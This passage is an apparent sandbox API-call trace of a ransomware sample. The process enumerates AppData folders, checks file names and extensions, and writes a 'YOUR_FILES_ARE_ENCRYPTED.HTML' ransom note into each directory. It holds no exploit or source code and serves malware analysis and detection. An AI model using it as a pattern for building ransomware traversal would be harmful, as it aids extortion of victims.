ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0165.287] FindNextFileW 
(in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd64b9fd0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 112 [0165.288] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.288] lstrlenW (lpString=".ini") returned 4 [0165.288] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33423f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa33423f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b93dbf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x926, dwReserved0=0x0, dwReserved1=0x60, cFileName="Excel 
2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned 115 [0165.288] lstrcmpW (lpString1="Excel 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="Excel 2016.lnk") returned=".lnk" [0165.288] lstrlenW (lpString=".lnk") returned 4 [0165.288] PathFindExtensionW (pszPath="Excel 2016.lnk") returned=".lnk" [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd646dd10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd646dd10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6101d70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 126 [0165.288] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="Internet Explorer (2).lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="Internet Explorer (2).lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a01436b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 122 [0165.289] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3472ef0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3472ef0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x912, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned 117 [0165.289] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="OneNote 2016.lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="OneNote 2016.lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, 
lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa350b470, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa350b470, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x920, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned 117 [0165.289] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="Outlook 2016.lnk") returned=".lnk" [0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="Outlook 2016.lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa35a39f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa35a39f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94b, dwReserved0=0x0, dwReserved1=0x60, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned 120 [0165.290] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.290] PathFindExtensionW (pszPath="PowerPoint 2016.lnk") returned=".lnk" 
[0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="PowerPoint 2016.lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6493e70, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6493e70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 125 [0165.290] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.290] PathFindExtensionW (pszPath="Windows Explorer (2).lnk") returned=".lnk" [0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="Windows Explorer (2).lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User 
Pinned\\TaskBar\\Windows Explorer.lnk") returned 121 [0165.290] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd64b9fd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd64b9fd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4c08c29, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 129 [0165.291] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Media Player (2).lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Media Player (2).lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media 
Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 125 [0165.291] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36d44f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b9b0010, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned 114 [0165.291] lstrcmpW (lpString1="Word 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.292] PathFindExtensionW (pszPath="Word 2016.lnk") returned=".lnk" [0165.292] lstrlenW (lpString=".lnk") returned 4 [0165.292] PathFindExtensionW (pszPath="Word 2016.lnk") returned=".lnk" [0165.292] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36d44f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa36d44f0, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b9b0010, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 0 [0165.292] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.292] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0165.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.295] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.298] CloseHandle (hObject=0x58c) returned 1 [0165.300] GetProcessHeap () returned 0x270000 [0165.301] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0165.301] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0165.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.305] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.307] CloseHandle (hObject=0x5b8) returned 1 [0165.308] GetProcessHeap () returned 0x270000 [0165.309] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.309] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 100 [0165.309] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.309] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0165.309] lstrlenW (lpString=".lnk") returned 4 [0165.309] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0165.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0165.309] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.309] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0165.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.310] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 
[0165.313] CloseHandle (hObject=0x304) returned 1 [0165.313] GetProcessHeap () returned 0x270000 [0165.314] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.319] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0165.319] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.319] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0165.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.320] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.322] CloseHandle (hObject=0x5e4) returned 1 [0165.323] GetProcessHeap () returned 0x270000 [0165.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.325] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0165.325] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network") returned 57 [0165.325] GetProcessHeap () returned 0x270000 [0165.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.325] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network" [0165.325] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*" [0165.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.328] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
